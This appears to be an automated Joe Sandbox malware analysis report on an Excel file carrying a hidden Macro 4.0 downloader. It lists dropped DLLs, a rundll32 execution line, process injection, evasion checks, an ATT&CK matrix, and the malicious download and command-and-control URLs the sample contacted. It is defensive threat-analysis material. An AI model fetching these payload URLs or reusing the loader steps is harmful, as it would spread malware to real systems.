    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Yzub\doa.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2760Thread sleep time: -300000s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0044D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00452EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00520D28 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00520C5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00520865 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E2EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0044AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: case (1057).xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050968A cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_005095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00441A00 CreateDialogParamW,GetVersion,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.rundll32.exe.440000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    5.2.msiexec.exe.d0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://govemedico.tk/post.php.u0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://gadgetswolf.com/0%Avira URL Cloudsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://gadgetswolf.com/post.php0%Avira URL Cloudsafe
    https://govemedico.tk/0%Avira URL Cloudsafe
    https://homesoapmolds.com/post.php0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://govemedico.tk/post.phpc0%Avira URL Cloudsafe
    https://report-uri.clou0%Avira URL Cloudsafe
    https://homesoapmolds.com/?p0%Avira URL Cloudsafe
    https://govemedico.tk/_u0%Avira URL Cloudsafe
    http://ocsp.digicer0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://crl4.digice0%Avira URL Cloudsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    172.67.198.109
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalse
        unknown
        gadgetswolf.com
        104.21.44.135
        truefalse
          unknown
          govemedico.tk
          104.21.73.69
          truefalse
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0DEE0000.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comrundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpfalse
                  high
                  http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                    high
                    http://ocsp.entrust.net03msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://govemedico.tk/post.php.umsiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/post.phpmsiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://govemedico.tk/msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://homesoapmolds.com/post.phpmsiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpfalse
                      high
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmpfalse
                          high
                          https://govemedico.tk/post.phpcmsiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://report-uri.cloumsiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpfalse
                            high
                            https://homesoapmolds.com/?pmsiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://govemedico.tk/_umsiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.digicermsiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.%s.comPAmsiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://crl4.digicemsiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~case (1057).xlsfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rnollg.com/kev/scfrd.dll$8case (1057).xls, 0DEE0000.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                              high
                              https://homesoapmolds.com/msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpfalse
                                high
                                Https://homesoapmolds.com/post.phpmsiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmpfalse
                                  unknown
                                  https://govemedico.tk/post.phpmsiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.67.150.228
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.21.44.135
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.21.73.69
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  172.67.198.109
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:344667
                                  Start date:26.01.2021
                                  Start time:21:37:14
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 6m 9s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:case (1057).xls
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.expl.evad.winXLS@7/12@4/4
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 67.6% (good quality ratio 67.3%)
                                  • Quality average: 89.5%
                                  • Quality standard deviation: 19.2%
                                  HCA Information:
                                  • Successful, ratio: 83%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xls
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • TCP Packets have been reduced to 100
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344667/sample/case (1057).xls

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  21:38:19API Interceptor1170x Sleep call for process: msiexec.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  172.67.150.228case (4335).xlsGet hashmaliciousBrowse
                                    case (1522).xlsGet hashmaliciousBrowse
                                      case (166).xlsGet hashmaliciousBrowse
                                        104.21.44.135case (4374).xlsGet hashmaliciousBrowse
                                          case (166).xlsGet hashmaliciousBrowse
                                            104.21.73.69case (4374).xlsGet hashmaliciousBrowse
                                              case (4335).xlsGet hashmaliciousBrowse
                                                case (1522).xlsGet hashmaliciousBrowse
                                                  172.67.198.109case (166).xlsGet hashmaliciousBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    rnollg.comcase (4335).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    homesoapmolds.comcase (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.198.109
                                                    govemedico.tkcase (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 172.67.158.184
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.158.184
                                                    gadgetswolf.comcase (4374).xlsGet hashmaliciousBrowse
                                                    • 172.67.200.147
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 172.67.200.147
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 172.67.200.147
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.44.135
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 104.21.44.135

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.198.109
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    Informacion.docGet hashmaliciousBrowse
                                                    • 104.21.89.78
                                                    PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                    • 162.159.133.233
                                                    SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    a4iz7zkilq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    nMn5eAMhBy.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    vK6VPijMoq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    8gom3VEZLS.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.198.109
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    Informacion.docGet hashmaliciousBrowse
                                                    • 104.21.89.78
                                                    PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                    • 162.159.133.233
                                                    SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    a4iz7zkilq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    nMn5eAMhBy.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    vK6VPijMoq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    8gom3VEZLS.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4335).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 104.21.73.69
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 104.21.60.169
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.198.109
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    Informacion.docGet hashmaliciousBrowse
                                                    • 104.21.89.78
                                                    PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                    • 162.159.133.233
                                                    SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    a4iz7zkilq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 104.21.23.220
                                                    nMn5eAMhBy.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    vK6VPijMoq.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    8gom3VEZLS.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    7dcce5b76c8b17472d024758970a406bcase (4335).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (1522).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (4374).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (166).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (547).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
